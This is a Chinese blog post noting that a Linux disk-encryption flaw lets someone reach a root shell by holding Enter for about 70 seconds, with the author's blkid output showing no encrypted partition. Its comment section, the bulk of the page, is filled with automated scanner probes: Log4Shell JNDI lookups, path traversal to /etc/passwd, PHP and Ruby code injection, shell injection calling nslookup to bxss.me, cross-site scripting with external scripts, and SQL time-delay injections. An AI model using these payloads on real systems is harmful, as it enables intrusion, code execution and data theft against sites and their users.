Stay Hungry.Stay Foolish.
按下"enter"键70秒触发init root shell

前言

开始看到这个漏洞,简直无法相信,我靠,逆天大后门?然后在自己机器狂按了几分钟,手都快脱臼了,反馈给我的只有不断的/etc/issue信息

\ 
            \          __---__
                    _-       /--______
               __--( /     \ )XXXXXXXXXXX\v.  
             .-XXX(   O   O  )XXXXXXXXXXXXXXX- 
            /XXX(       U     )        XXXXXXX\ 
          /XXXXX(              )--_  XXXXXXXXXXX\ 
         /XXXXX/ (      O     )   XXXXXX   \XXXXX\ 
         XXXXX/   /            XXXXXX   \__ \XXXXX
         XXXXXX__/          XXXXXX         \__---->
 ---___  XXX__/          XXXXXX      \__         /
   \-  --__/   ___/\  XXXXXX            /  ___--/=
    \-\    ___/    XXXXXX              '--- XXXXXX
       \-\/XXX\ XXXXXX                      /XXXXX
         \XXXXXXXXX   \                    /XXXXX/
          \XXXXXX      >                 _/XXXXX/
            \XXXXX--__/              __-- XXXX/
             -XXXXXXXX---------------  XXXXXX-
                \XXXXXXXXXXXXXXXXXXXXXXXXXX/
                    VXXXXXXXXXXXXXXXXXXV

是不是很萌~。~

漏洞复现

最后看了原文发现触发此漏洞需要一个前提条件。

  • 安装linux的时候,比如ubuntu,需要选择加密磁盘这一选项,这是触发漏洞的关键。 blkid 看了下自己的分区信息如下
/dev/sda1: LABEL="Windows7_0S" UUID="E4B85589B8555ADE" TYPE="ntfs" PARTUUID="167b5d84-01"
/dev/sda2: UUID="wQ04tk-pZSp-nRFw-m0ii-4L2Y-9ie8-gM5hyp" TYPE="LVM2_member" PARTUUID="167b5d84-02"
/dev/sda3: UUID="12c245f2-6788-4e6d-b60d-aa5e795bdfb2" TYPE="ext4" PARTUUID="167b5d84-03"
/dev/sda5: UUID="Xzgqfc-JSJE-Wdhm-TLn6-dfK6-YbnR-ZZgsED" TYPE="LVM2_member" PARTUUID="167b5d84-05"
/dev/mapper/fedora-swap: UUID="515583ce-7cc4-41ce-8241-0c756f963f43" TYPE="swap"
/dev/mapper/fedora-root: UUID="e52e1aa2-f581-464c-af9e-eeebf9d69d47" TYPE="ext4"
/dev/mapper/fedora-home: UUID="8ff0838e-39b0-4e2b-b10c-0cb66901cddf" TYPE="ext4"
/dev/loop0: UUID="6dc87128-30c5-43b6-9f7c-5901a0740db3" TYPE="ext4"
/dev/mapper/docker-253:1-2363736-pool: UUID="6dc87128-30c5-43b6-9f7c-5901a0740db3" TYPE="ext4"

没有加密分区,可以安心午睡了。

自由转载-非商用-非衍生-保持署名(创意共享3.0许可证
评论
2023-11-15 07:57:33

<esi:include src="http://bxss.me/rpb.png"/>

2023-11-15 07:57:34

${9999491+9999370}

2023-11-15 07:57:36

9TcySDqd

2023-11-15 07:57:45

${j${::-n}di:dns${::-:}//hitizsghhbmew3fe5a${::-.}bxss.me}zzzz

2023-11-15 07:57:46

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

2023-11-15 07:57:46

response.write(9459926*9802430)

2023-11-15 07:57:46

../../../../../../../../../../../../../../etc/passwd

2023-11-15 07:57:47

../../../../../../../../../../../../../../windows/win.ini

2023-11-15 07:57:47

'+response.write(9459926*9802430)+'

2023-11-15 07:57:47

${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}//dns.log4j..-1245..2ea7a${::-.}1${::-.}bxss.me}}

2023-11-15 07:57:48

&n947560=v976800

2023-11-15 07:57:48

"+response.write(9459926*9802430)+"

2023-11-15 07:57:48

Http://bxss.me/t/fit.txt

2023-11-15 07:57:49

http://bxss.me/t/fit.txt?.jpg

2023-11-15 07:57:50

bxss.me

2023-11-15 07:57:54

!(()&&!|*|*|

2023-11-15 07:57:55

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

2023-11-15 07:57:56

^(#$!@#$)(()))******

2023-11-15 07:57:56

/xfs.bxss.me

2023-11-15 07:57:57

ctime sleep p0 (I30 tp1 Rp2 .

2023-11-15 07:57:59

'.gethostbyname(lc('hitwn'.'vmkfoddu62ee7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(81).chr(106).chr(89).'

2023-11-15 07:57:59

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

2023-11-15 07:58:00

1epmGgCEO

2023-11-15 07:58:00

".gethostbyname(lc("hitfj"."eqbzzhcz6accf.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(90).chr(116).chr(79)."

2023-11-15 07:58:00

';print(md5(31337));$a='

2023-11-15 07:58:01

";print(md5(31337));$a="

2023-11-15 07:58:03

${@print(md5(31337))}

2023-11-15 07:58:05

${@print(md5(31337))}\

2023-11-15 07:58:05

echo snihcc$()\ axutjs\nz^xyu||a #' &echo snihcc$()\ axutjs\nz^xyu||a #|" &echo snihcc$()\ axutjs\nz^xyu||a #

2023-11-15 07:58:06

&echo ohnqzg$()\ wgtran\nz^xyu||a #' &echo ohnqzg$()\ wgtran\nz^xyu||a #|" &echo ohnqzg$()\ wgtran\nz^xyu||a #

2023-11-15 07:58:07

'.print(md5(31337)).'

2023-11-15 07:58:07

"+"A".concat(70-3).concat(22*4).concat(116).concat(82).concat(97).concat(89)+(require"socket" Socket.gethostbyname("hitgn"+"qrkzswhf13951.bxss.me.")[3].to_s)+"

2023-11-15 07:58:07

|echo hrnmit$()\ kfnarv\nz^xyu||a #' |echo hrnmit$()\ kfnarv\nz^xyu||a #|" |echo hrnmit$()\ kfnarv\nz^xyu||a #

2023-11-15 07:58:08

HttP://bxss.me/t/xss.html?%00

2023-11-15 07:58:08

(nslookup hitrmdnqsegvc96b2b.bxss.me||perl -e "gethostbyname('hitrmdnqsegvc96b2b.bxss.me')")

2023-11-15 07:58:09

'+'A'.concat(70-3).concat(22*4).concat(106).concat(86).concat(113).concat(89)+(require'socket' Socket.gethostbyname('hitiw'+'hojfygvy1424e.bxss.me.')[3].to_s)+'

2023-11-15 07:58:09

bxss.me/t/xss.html?%00

2023-11-15 07:58:10

$(nslookup hitttnvvkimjr8b25b.bxss.me||perl -e "gethostbyname('hitttnvvkimjr8b25b.bxss.me')")

2023-11-15 07:58:11

&(nslookup hitbmmnlbxepb80074.bxss.me||perl -e "gethostbyname('hitbmmnlbxepb80074.bxss.me')")&'\"`0&(nslookup hitbmmnlbxepb80074.bxss.me||perl -e "gethostbyname('hitbmmnlbxepb80074.bxss.me')")&`'

2023-11-15 07:58:11

comments

2023-11-15 07:58:12

|(nslookup hitptrhjwqczs5aea2.bxss.me||perl -e "gethostbyname('hitptrhjwqczs5aea2.bxss.me')")

2023-11-15 07:58:13

comments/.

2023-11-15 07:58:13

`(nslookup hitlilbmtcdxf20f94.bxss.me||perl -e "gethostbyname('hitlilbmtcdxf20f94.bxss.me')")`

2023-11-15 07:58:13

'"()&%<acx><ScRiPt >NmfC(9110)</ScRiPt>

2023-11-15 07:58:14

'"()&%<acx><ScRiPt >NmfC(9357)</ScRiPt>

2023-11-15 07:58:18

9683127

2023-11-15 07:58:21

acu2547<s1﹥s2ʺs3ʹuca2547

2023-11-15 07:58:25

<%={{={@{#{${acx}}%>

2023-11-15 07:58:30

<th:t="${acx}#foreach

2023-11-15 07:58:34

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

2023-11-15 07:58:40

acx{{98991*97996}}xca

2023-11-15 07:58:43

acx[[${98991*97996}]]xca

2023-11-15 07:58:45

acx__${98991*97996}__::.x

2023-11-15 07:58:46

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

2023-11-15 07:58:50

<ScRiPt >NmfC(9055)</ScRiPt>

2023-11-15 07:58:52

<WDG708>HB98Z[!+!]</WDG708>

2023-11-15 07:58:56

<script>NmfC(9000)</script>

2023-11-15 07:58:59

<ScR<ScRiPt>IpT>NmfC(9121)</sCr<ScRiPt>IpT>

2023-11-15 07:59:02

<ScRiPt >NmfC(9689)</ScRiPt>

2023-11-15 07:59:05

<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9416></ScRiPt>

2023-11-15 07:59:11

<isindex type=image src=1 onerror=NmfC(9629)>

2023-11-15 07:59:15

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9456'>

2023-11-15 07:59:18

<body onload=NmfC(9661)>

2023-11-15 07:59:20

<img src=//xss.bxss.me/t/dot.gif onload=NmfC(9378)>

2023-11-15 07:59:23

<img src=xyz OnErRor=NmfC(9610)>

2023-11-15 07:59:25

<img/src=">" onerror=alert(9420)>

2023-11-15 07:59:27

%0A%3C%53%63%52%69%50%74%20%3E%4E%6D%66%43%289552%29%3C%2F%73%43%72%69%70%54%3E

2023-11-15 07:59:29

\u003CScRiPt\NmfC(9963)\u003C/sCripT\u003E

2023-11-15 07:59:33

&lt;ScRiPt&gt;NmfC(9205)&lt;/sCripT&gt;

2023-11-15 07:59:36

<input autofocus onfocus=NmfC(9082)>

2023-11-15 07:59:38

<a HrEF=http://xss.bxss.me></a>

2023-11-15 07:59:42

<a HrEF=jaVaScRiPT:>

2023-11-15 07:59:43

}body{acu:Expre/**/SSion(NmfC(9901))}

2023-11-15 07:59:45

Yvczs <ScRiPt >NmfC(9614)</ScRiPt>

2023-11-15 07:59:47

<WY1QYQ>VOCVM[!+!]</WY1QYQ>

2023-11-15 07:59:49

<ifRAme sRc=9992.com></IfRamE>

2023-11-15 07:59:51

<a36Fqu6 x=9286>

2023-11-15 07:59:54

<img sRc='http://attacker-9109/log.php?

2023-11-15 07:59:57

<aLeiGdL<

2023-11-15 08:00:08

7FhewNKH

2023-11-15 08:00:11

-1 OR 2+11-11-1=0+0+0+1 --

2023-11-15 08:00:14

-1 OR 2+784-784-1=0+0+0+1

2023-11-15 08:00:16

-1' OR 2+660-660-1=0+0+0+1 --

2023-11-15 08:00:17

-1' OR 2+926-926-1=0+0+0+1 or 'jZftvM15'='

2023-11-15 08:00:18

-1" OR 2+941-941-1=0+0+0+1 --

2023-11-15 08:00:21

if(now()=sysdate(),sleep(15),0)

2023-11-15 08:00:23

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

2023-11-15 08:00:30

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

2023-11-15 08:00:37

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

2023-11-15 08:00:42

-1; waitfor delay '0:0:15' --

2023-11-15 08:00:46

-1); waitfor delay '0:0:15' --

2023-11-15 08:00:47

1 waitfor delay '0:0:15' --

2023-11-15 08:00:49

QTXkDb35'; waitfor delay '0:0:15' --

2023-11-15 08:00:55

-5 OR 98=(SELECT 98 FROM PG_SLEEP(15))--

2023-11-15 08:01:00

-5) OR 778=(SELECT 778 FROM PG_SLEEP(15))--

2023-11-15 08:01:07

-1)) OR 508=(SELECT 508 FROM PG_SLEEP(15))--

2023-11-15 08:01:15

Gj95kppB' OR 313=(SELECT 313 FROM PG_SLEEP(15))--

2023-11-15 08:01:20

yZGlmzI3') OR 837=(SELECT 837 FROM PG_SLEEP(15))--

2023-11-15 08:01:26

heXJ4bHM')) OR 397=(SELECT 397 FROM PG_SLEEP(15))--

2023-11-15 08:01:34

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

2023-11-15 08:01:42

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

2023-11-15 08:01:48

@@OmJI1